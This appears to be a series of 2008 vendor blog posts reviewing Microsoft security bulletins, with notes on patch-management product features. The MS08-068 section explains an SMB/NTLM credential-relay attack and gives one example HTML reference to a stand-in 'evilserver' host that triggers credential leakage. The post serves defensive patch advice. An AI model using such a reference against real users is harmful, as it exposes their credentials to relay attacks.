Well, it looks like they've finally seen the light and have addressed this issue via the MS08-068 patch. To highlight how this works, here's an example: The attacker and the victim are on the same corporate network. The victim's firewall either allows file and printer sharing services to function, and/or the firewall has been turned off. The attacker sends the victim an html email (or convinces them to visit their website) where the html code includes a reference like: <file://evilserver/picturejpg>. When the victim machine goes to view this html, it attempts to display the 'picture' jpg. To do this, it needs to connect to the evilserver machine over NetBIOS ports. The evilserver machine asks the victim machine to authenticate to it, so it can then serve up the picture.jpg file. The victim machine performs NTLM challenge-response authentication process in order to connect to evilserver to get this picture file. Whether the authentication succeeds or fails, it's already too late. The evil server now has challenge-response data that it can use to reply back to the victim's machine - allowing the attacker to simply connect to the victim's machine without providing any specific password. The attacker has the same credentials as the user had on their system and can read and write files, modify the registry, delete objects, access emails, etc. I used to demonstrate this attack in classroom training events around the country. It was very eye opening for people to see a very easy to use exploit that could result in accessing anyone's computer on their network. That this had been acknowledged by Microsoft in 2001 but never fixed was an equally eye-opening bit of news for the classroom participants. This is a pretty scary attack that should keep IT managers up at night until it's fully patched. "How do I know I haven't already been hacked with this exploit?" "Who's been accessing my computer without my password?" "Well, you don't really know. Anyone with a computer on a typical corporate network and a copy of Sir Dystic's SMBRelay exploit has probably already been on your computer and you'd never know. To fix the issue, apply the patch. Or, enable SMBsigning on all your NetBIOS communication (something Microsoft recommended in 2001 when this issue was first raised.) Or, enable personal firewalls on all machines and disable the Server service. This is certainly another good excuse to block inbound and outbound NetBIOS access at your corporate firewalls if you aren't already. Regarding MS08-069, this is a Critical vulnerability in the Microsoft MSXML parser that ships both in the OS and in most Office products. Visit the wrong website or open a malicious document and you're hacked. Nuff said. Apply the patch. Reflections on the October 2008 Microsoft patch release Lots of security patches released today. Different than most months. In prior months, the majority of the security bulletins addressed 'client-side' vulnerabilities. ie. those that require user interaction, such as visiting an evil website or opening a malformed document. This month, we had a good number of 'server-side' vulnerabilities. Server side vulnerabilities are a hacker's best friend. They enable attackers to target a system they'd like to break into and not wait for a user to take an action before the attack can be completed. (In a client-side attack, you also don't have control over who might open the email or visit the site.) The most interesting bulletins this month are in the middle of the pack - MS08-060 through MS08-063. We'll start with those and then touch on the rest. MS08-060 'Vulnerability in Active Directory Could Allow Remote Code Execution (957280)' is a Critical issue that impacts Windows 2000 domain controllers. This one is really nasty. Unauthenticated users can send a specially crafted LDAP packet to the Win2K AD server and then do with that server what they wish. Complete Domain Admin access, if they do it correctly. Once you have domain admin access, you can add your own user account, delete user accounts, lockout accounts, access nearly any desktop, laptop or server that is a member of the domain, delete files, install or remove services, or monkey with group policy objects. I'd get this one patched as soon as possible if I have any Windows 2000 DC's on my network. Note, this attack is probably limited to internal networks - as the LDAP and SSL LDAP ports (tcp 389 and tcp 636) are usually blocked at the corporate firewall. MS08-063 'Vulnerability in SMB Could Allow Remote Code Execution (957095)' is my next favorite one this month. Microsoft calls this one Important, I call it cool. SMB is the protocol that you use to perform file and printer sharing activities on your network - anything from logging-in to accessing shared files to sending a document to a printer - it's all SMB. If a disgruntled user connects to a file share on a remote system and renames a specific file in that share in specific manner (including length), the renamed file will cause code to execute on that file server - thereby enabling the attacker to run code of their choice on that server. This impacts all Operating Systems - Windows 2000 through Windows Server 2008. This attack will be primarily an internal network attack, as the SMB ports (tcp 139 and tcp 445) are usually blocked at the firewall. MS08-061 'Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (954211)' and MS08-062 'Vulnerability in Windows Internet Printing Service Could Allow Remote Code Execution (953155)' are each rated Important, yet when exploited together, should be considered Critical. MS08-062 is a flaw in the Internet Printing Service that is present in IIS installations. In this attack, the hacker sends commands to the Internet Printer Service on the target system. The target system responds by connecting to the SMB port (tcp 445) on the hacker's computer to pick up and execute the evil code. The evil code will execute in kernel mode (aka admin rights). The threat is mitigated somewhat, as the attacker must have some level of credentials to the system before they submit the commands to the printer service. It's also unlikely that the IIS server will have outbound SMB access to the hacker's workstation, as outbound SMB traffic should be blocked at the firewall. Exploit code for this issue has been discovered on the Internet. MS08-061 is a privilege escalation attack. By executing special code on a target server, the attacker can raise their permissions from that of 'user' to a higher level account (like administrator). Envision a shared web server environment, where you (as a user level account) can upload code to a webserver hosted by your ISP. Upload the evil privilege escalation code to the webserver. Once it's posted to your webserver, execute this file via your web browser. The IIS service now has admin level permissions and can do various tasks like dumping out password hashes, reading files, and creating backdoors. This attack impacts all Operating systems. Microsoft rates this as Important, as it requires that you already have access to upload code to the webserver. Microsoft says that exploit code for this is likely. A quick review of the other items: MS08-057: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (956416) is another 'open a malicious document and get hacked' vulnerability that applies to all versions of Excel. Nuff said. (Microsoft says this is Critical and working exploit code is likely.) MS08-058: Cumulative Security Update for Internet Explorer (956390) is a 'visit an evil website and get hacked' vulnerability. Also known as 'IE patch of the month'. (Microsoft rates this as Critical and says that exploit code is likely. The vulnerability impacting IE on Windows 2000 was previously made public.) MS08-059: Vulnerability in Host Integration Server RPC Service Could Allow Remote Code Execution (956695) is rated Critical and impacts Host Integration Servers (2000, 2004, 2006) - otherwise known as SNA Servers. An unauthenticated attacker can issue SNARPC commands to the target system and execute any commands they want on the server. If you have SNA Servers, get them patched right away. If you don't know what SNA Servers are, ignore this one. MS08-064: Vulnerability in Virtual Address Descriptor Manipulation Could Allow Elevation of Privilege (956841) is an Important patch (as per Microsoft) that could enable 'users' to become 'administrators' on their systems. Similar to MS08-061, but only applies to XP and later systems. MS08-065: Vulnerability in Message Queuing Could Allow Remote Code Execution (951071) is rated Important by Microsoft, but should be rated Critical (as compared to the MS08-059 Host Integration Server standards). Windows 2000 systems with MSMQ installed can be hacked by anonymous (internal) users by sending an RPC request to the MSMQ Service. The attacker can then do as they please with the target system. Microsoft says code execution is difficult in this attack, and therefore doesn't expect to see any exploit code for this to be released. MS08-066: Vulnerability in the Microsoft Ancillary Function Driver Could Allow Elevation of Privilege (956803) is an Important bulletin and impacts XP and WS03 systems. Like MS08-064 and MS08-061, this can enable attackers to move from user status to admin status on their systems. Microsoft says exploit code is likely to be released. Finally, Microsoft released their exploitability index today. This provides Microsoft's take on how difficult an exploit would be to craft, and whether we're likely to see working exploit code for the issue (information gleaned from these ratings in included in the summaries above.) While I like the concept of this guide, I couldn't actually find the data. Microsoft didn't include this in the security bulletins themselves, but rather in the monthly security bulletin summary (who reads that?). Microsoft would be well served to include this information in the bulletin itself in future Patch Tuesday releases. Reflections on the September 2008 Microsoft patch release All four security bulletins this month are rated Critical, and all four relate to problems when a user visits an evil website (or listens to an audio stream from a malicious website). In other words, focus on patching your end-user machines first rather than the servers in your datacenter. Since these exploits require users to perform actions on their computers, like visiting a website, servers in a datacenter are less prone to be exploited as user's aren't typically browsing the Internet from these servers. Of the four bulletins released this month, MS08-052 is the most important one to patch first. MS08-052 impacts the graphics engine on Windows XP and later systems. The graphics engine is part of all Operating Systems, and is also included with Microsoft Office and Microsoft SQL Server products, among others. You may need to install multiple patches on your system to address this issue, where each patch updates a different component on your computer. Unfortunately, Microsoft hasn't made it easy to determine which collection of patches you may need on each system - making it more likely that some systems will go unpatched for some portion of affected products. Also, the security bulletin doesn't make it very clear as to which patches in this bulletin will be patched with WSUS vs. the patches you'll need to install manually. Bulletins MS08-053 and MS08-054 relate to Windows Media items. 08-053 is an improperly marked ActiveX control that can execute code on your system if you visit an evil website. 08-054 can exploit your system if you're enjoying streaming audio files with Windows Media Player 11. (maybe cutting edge aint so grand?!) Finally, MS08-055 is a flaw with URI protocol handling and Microsoft OneNote 2007. Similar in style to the Firefox vs. Microsoft debates from July of 2007, clicking on a hyperlink that has a URL with onenote:// as the protocol may cause code to execute on your machine (you must have OneNote installed on your machine to be vulnerable). Microsoft fixed the "shellexecute" flaw that lead to the Firefox debacle (MS07-061) - however, this new onenote:// flaw is slightly different and isn't addressed by the MS07-061 patch. Reflections on July 2008 Microsoft Patch Day One could say it's a pretty quiet Microsoft patch release day. Microsoft only released 4 security bulletins, labeling all as Important (none as Critical). Of the four bulletins, one relates to a flaw in Outlook Web Access (OWA) that could allow an attacker to read, create, send, or delete emails on behalf of the unwitting OWA user, patching the OWA Exchange 2003 or 2007 Server corrects this. Beware, it's a very large patch. A second bulletin is specific to SQL Server, and when I say SQL Server, I mean ALL versions of SQL Server. SQL Server 7 through SQL Server 2005, including MSDE and WMSDE installations, are impacted (including WSUS installs running WMSDE). This vulnerability allows 'authenticated' attackers to potentially access information that they shouldn't be able to access. The bar is set very high for the attacker here - it's not a simple type of exploit that most corporate users could pull off. A third bulletin relates to just Windows Vista and Windows Server 2008. If a user on one of these systems receives an email with a malicious saved-search file, and opens this file and re-saves it, then evil code may run on their system. Also, if a user visits an evil website where this saved-search file resides, code may be executed on the user's system. It's unclear from Microsoft's bulletin whether the user must download and save the saved-search file to their own system, or if this exploit happens simply by visiting the evil website. Earlier in the bulletin, Microsoft states that a user "open and save a specially crafted saved-search file with an affected version of Windows Explorer". Then it goes on to say that in a web-based scenario, visiting a malicious website could allow this to happen. Microsoft should really review their bulletins and make it a little more clear (or less confusing) about what actions really trigger this event. The fourth bulletin this month relates to DNS services - both the DNS server and the DNS client. All Operating Systems other than Vista are impacted. With respect to this issue, attackers can remotely poison a DNS Server or DNS Cache with incorrect Internet domain names to IP address mappings, causing users to surf to erroneous web locations. The biggest beef I have with this month's group of patch releases is the classification of vulnerabilities that Microsoft has chosen to use. In some cases, it's rather absurd. In the case of MS08-040 (SQL Server), Microsoft calls this 'Important', but the attacker can 'execute code of the attacker's choice'. Microsoft doesn't label this as 'code execution', but rather as 'escalation of privilege', because the attacker must be an 'authenticated attacker'. Raise of hands - "who's an 'authenticated' hacker"? It sure seems like Microsoft is re-writing their definitions this month. They've downgraded 'code execution' attacks if the attacks happen to come from 'authenticated users'. And it's not longer called 'code execution’; it's called 'privilege escalation'. I can see where Microsoft is coming from, and it's a very rosy side of Redmond. The other bulletins also seem to be downgraded in terms of severity because of what Microsoft believes to be 'additional steps that must be taken and/or limits of what can be done' (my terms). In one case, the vulnerability is downgraded because a user must save a file to their disk (leave it 'Critical' and downplay the likelihood of attack instead) and in another case, the vulnerability is downgraded because the user can only spoof your email, delete your mail, etc. rather than delete other files on your system. Who's Microsoft to say that your email isn't super critical? Protection against Safari Microsoft has issued a Security Advisory to alert folks to a security risk if they are running Apple's Safari web browser on a Microsoft system. (www.microsoft.com/technet/security/advisory/953818.mspx) What is the issue? The Safari web browser doesn't prompt users before downloading and saving files to their system. In contrast, both Internet Explorer and Mozilla Firefox prompt users before saving downloaded files to the system. This 'oversight' on Apple's part can put users at risk. Specifically, visiting a malicious website with Safari can cause an unintended download of software to the machine. This software can also be automatically executed on the machine - all without the user's consent. In short - a very bad thing. While Apple considers adding a 'feature' to prompt users before downloading files, and while Microsoft ponders if it can do anything via a security patch, the best advice is not to use Safari. (Shavlik customers running NetChk Protect can perform a NonBizWare spyware scan to help identify Safari installations and automatically remove them as desired.) Microsoft Update - Not Up To The Job This month's release of Microsoft security updates underscores the risk in relying on Microsoft's patch management tools. Specifically, the Microsoft update mechanism found in Windows Update, Microsoft Update, SMS, and SCCM only scans for 75% of the security bulletins released this month. (And within that 75%, these tools don't scan for certain older versions of products, like those running Office 2000 applications.) MS08-029 addresses a vulnerability in the Microsoft security suite of tools that include the Microsoft malware engine, including Windows Live OneCare, Antigen for Exchange, Windows Defender, and Forefront Client Security, among others. Unfortunately, Windows update technologies won't tell you which of your systems are vulnerable - much less which systems you have that even run these applications. Users are left on their own to launch these applications and update them. Although these applications "provide built-in mechanisms for automatic detection and deployment of updates" they leave enterprises without the ability to centrally identify their risk, report on their security posture, or have any knowledge about their level of vulnerability to this issue. Microsoft Update and the WSUS engine was supposed to be the one-stop shop to understand Microsoft patch status across the enterprise. Of course, this assumes that all Microsoft products work with the Microsoft Update engine. With the advent of the Live product line and the Microsoft security suite, they seem to believe that these products are 'above' the need to provide central update management capabilities with their peer software applications. Security Bulletin MS08-029 discusses a security vulnerability that, while it cannot remotely take over your system, can be used to cause widespread denial of service, or when combined with other exploits, can be used to enable an attacker to gain additional access to a system (by forcing a reboot which may in turn aid other exploits in need of a system restart). In either event, I don't want this on my network, and I'd like to know how prevalent these applications are. Until Microsoft can report centrally on the patch management status for all of its applications, I'll stick with my thesis - Microsoft Update is not up to date. MS08-021 Being Exploited I don’t mean to tell you ‘I told you so’, but I will. I told you so. As we discussed in the April post patch day webinar, MS08-021 is the most important patch to get installed from the April patch release. eWeek is reporting that an exploit was released in the wild for the graphic image exploit vulnerability a mere 2 days after the patch was released. More info here: Reflections on April 2008 patch day All 8 bulletins this month are client side vulnerabilities. IOW, your system is safe unless a user logs in and opens documents, reads email, or visits an evil website on that computer. Systems where no one logs on and does this (ie Servers in data center) are safe. Of the five OS-related vulnerabilities this month, four impact Vista and Windows Server 2008. The most critical to get installed away are MS08-021, MS08-022, and MS08-024. Of these, MS08-021 is the most important, as it can be exploited by all three attack vectors: visiting an evil website, opening an evil document, or reading an evil email. MS08-021 is a flaw in the way that image files are processed - an evil graphic file can execute code on your system. This is the third such evil graphic file attack since January of 2006. MS08-022 is a flaw in jscript and vbscript in IE6 and earlier versions of IE. Visit an evil website and you'll get hacked. This is the patch that was delayed from the January release cycle. MS08-024 is a flaw in all versions of IE - visit an evil website and you'll get hacked. MS08-025 is a privilege escalation vulnerability that can allow a user to elevate themselves from user to admin. This can also be exploited by any of the other vulnerabilities announced this month. IOW, visit an evil website and it can execute code on your system to make you an admin - then the evil website can do anything on your system that it wants. IOW, from what I can tell, this vulnerability erases the mitigation that MS provides for all earlier patches about - 'the evil code will only execute with the permissions of the logged on user - therefore you are safer if you are logged on with a non administrative account).' Supporting Virtualization I'm really excited to talk about one of our upcoming features - specifically, support for Virtualization. Shavlik already supports patch and configuration management for virtual systems on your network. A running virtual system is just like a real system to Shavlik NetChk Protect and NetChk Compliance (now NetChk Configure). You can scan and patch these virtual systems today to ensure that your running VMs are protected. Now Shavlik is taking things to the next level. Upcoming releases of Shavlik NetChk Protect will enable you to scan and patch OFFLINE virtual images. Offline images are those that aren't currently powered on. You may have hundreds of offline virtual images in your VM repository - these VMs are powered on for hours or days and may be powered off again until the next month when they are needed. It's important to ensure that these systems are patched as soon as they are brought online, else you place your network at risk from these unpatched systems. Shavlik NetChk Protect makes it easy patch these systems. Simply reference the offline image or folder of images in a NetChk machine group and perform a scan like usual. The Protect scan engine will perform a full patch assessment of each image and results are displayed alongside results for running systems (you'll be able to differentiate images from running systems in the results view). Patching these offline images is similarly simple. Highlight the images and patches you'd like to install and select 'deploy' from the Shavlik menu. The patches will be copied to the offline images and will be installed the moment that the virtual image is started (or according to its scheduled deployment time). What's really nice about this feature is the ability to patch not only the VM images that you know about (ESX SAN drive, folder of MS Virtual Server images, etc) but you can also scan desktops and servers for presence of VMware Workstation, VMware Server, and Microsoft Virtual PC images. Additional information about the offline virtual scanning and patching functions are available in Shavlik Knowledge Base Article SKB 5788. Speeding up agentless deployment with distribution servers I thought I'd take this time to share an idea that might help you speed up the agentless patch deployment process. Turns out, some work we did to support agent-based deployments can provide a big benefit for agentless deployments. In a standard agentless deployment, the NetChk console pushes each patch or group of patches to each remote system. If there are two patches to push to each of 1,000 systems, the console will push 2,000 patches total. The console can push to 64 machines simultaneously - so it may take some time to push out all of the patches all of the machines. The patch push can also consume a lot of network bandwidth, especially if pushing patches to a large number of systems across a slow link. We can address both speed and bandwidth issues for agentless deployments via the use of distribution servers. The term 'distribution server' is really a misnomer. It's not really a server at all. Instead, a distribution server is simply a UNC file share or a web share on a workstation or server machine. Let's start with the simple scenario: use the NetChk console as a distribution server. On the NetChk console, share out the C:\Program Files\Shavlik Technologies\NetChk\Patches\en-us (or similar) folder with read-only permissions for a specific netchk patch user account. This 'share' is your distribution server. Next, go to tools-distribution servers to define the distribution server share you just created. Select New on the servers tab and then select the UNC radio button. Enter the UNC path to the share (ex. \\console\patchrepository) and the username and password for the account that has read-only access to this share (don't worry, this password info is encrypted). There's no need to enter synchronization data at the bottom of this window because the console patch repository is the same location as the distribution server share. On the IP ranges tab of the distribution server window, create an IP range for your network. If you want all of your machines to use the same distribution server, you may enter 0.0.0.0 - 255.255.255.255. Assign the distribution server you just created to this IP range. Finally, go to the deployment template that you'd like to use and select the distribution servers tab. Check the box to deploy patches using distribution servers. Set the randomization number of minutes (if desired) and also decide if you want the target systems to download the patches from the vendor websites directly if the machines can't contact the distribution server. Here is where the magic happens. When you go to deploy patches using this deployment template, the patches won't be pushed to each systems. Instead, the NetChk console will push a very small deployment instruction set to each machine (and the Shavlik Scheduler, if not already present) and will schedule that instruction set to execute at the scheduled deployment time. When this deployment time occurs, the system will realize that it doesn't have the necessary patches to deploy, it will read the instruction set to obtain the distribution server information, and it will then login to the distribution server and download the specified patches. The above process will speed up the deployment process, however, the overall bandwidth hit against the network will be the same as if the console was doing a normal patch push. To conserve bandwidth and better handle remote sites, consider the following: Create one distribution server at each remote site. This can be the UNC style distribution server we created above, or an http or https website at each remote site. The distribution server UNC or web share can reside on workstation or server class machines - whatever is 'always available' at the remote site. (Keep in mind that workstation class machines may only support ten concurrent sessions for UNC and web connections). When defining the distribution servers, create groups of IP addresses - one group for each remote site - and assign the IP ranges to the distribution server at that site. This will ensure that the machines at remote site A will download their patches over the local area network from the distribution server at site A, thus reducing your network bandwidth over the slow link back to the NetChk console. Make sure to run the distribution server sync function to ensure that the remote distribution servers have a full copy of the patches from the console. The above process is a unique method to leverage distribution servers (normally reserved for agent-based deployments) to aid in the speed and network bandwidth utilization when performing agentless deployments. Reflections on March 2008 Patch Day It’s an all Office patch day today. More to the point, an all Excel day. Nine of the twelve vulnerabilities addressed this month relate to Microsoft Excel. The twelve vulnerabilities were encapsulated in 4 security bulletins – each one patching an Office related client side vulnerability. Order of importance to patch for the month: MS08-015, MS08-014, MS08-016, MS08-017. MS08-014 MS08-015 |